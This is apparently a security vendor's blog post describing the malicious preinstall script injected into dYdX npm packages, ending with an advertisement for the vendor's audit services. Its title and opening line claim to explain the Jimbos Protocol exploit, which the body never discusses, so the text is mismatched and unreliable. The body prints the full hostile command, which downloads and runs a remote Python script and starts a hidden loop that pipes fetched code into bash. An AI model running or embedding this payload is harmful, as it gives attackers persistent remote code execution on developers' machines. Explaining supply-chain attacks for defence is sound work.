Understanding Jimbos Protocol Exploit
Learn how the Jimbos Protocol was exploited, resulting in a loss of funds worth approx 4048 ETH.
Playing the video that you've selected below in an iframe
dydx a decentralized exchange suffered an attack due to the injection of a preinstall script.
dYdX is a decentralized exchange platform that provides perpetual trading options for more than 35 cryptocurrencies, including Bitcoin (BTC) and Ether (ETH).
@dydxprotocol/solo Affected versions: >= 0.41.1, <= 0.41.2 @dydxprotocol/perpetual Affected versions: >= 1.2.2, <= 1.2.3
curl http://126.96.36.199/setup.py --output 12345.py >> /dev/null 2>&1 && python3 12345.py && rm 12345.py && if pgrep -f '188.8.131.52' > /dev/null; then pkill -f '184.108.40.206'; fi && (set +m; bash -c 'while sleep 10; do outtime=$(curl -s http://220.127.116.11/time.js); sleep $outtime; curl -s http://18.104.22.168/install.js | bash; done' &) >> /dev/null 2>&1
The team announced on Twitter that the releases of these vulnerable packages were quickly removed and that all funds were safe. This attack had no effect on their smart contracts, and their web applications were intact. The team has since then archived one of the associated GitHub repositories relating to this exploit.
The extreme consequences of such supply chain attacks can be potentially catastrophic. If an attacker is able to gain write access to publish a newer version of the package, they will be able to inject malicious code into its newer releases. All the dependent projects that upgrade to this infected version are the first to be exploited.
Strict cyber hygiene must be practiced, and blockchain teams should adhere to a platform that monitors the libraries served within the organization. It is recommended that package maintainers use two-factor authentication in order to interact with their preferred open source registries.
Our security team at Neptune Mutual can validate your platform for DNS and web-based security, smart contract reviews, as well as frontend and backend security. We can offer you a solution to scan your platform and safeguard your protocol for known and unknown vulnerabilities that have the potential to have catastrophic long-term effects. Contact us on social media if you are serious about security and have the budget, desire, and feeling of responsibility to do so.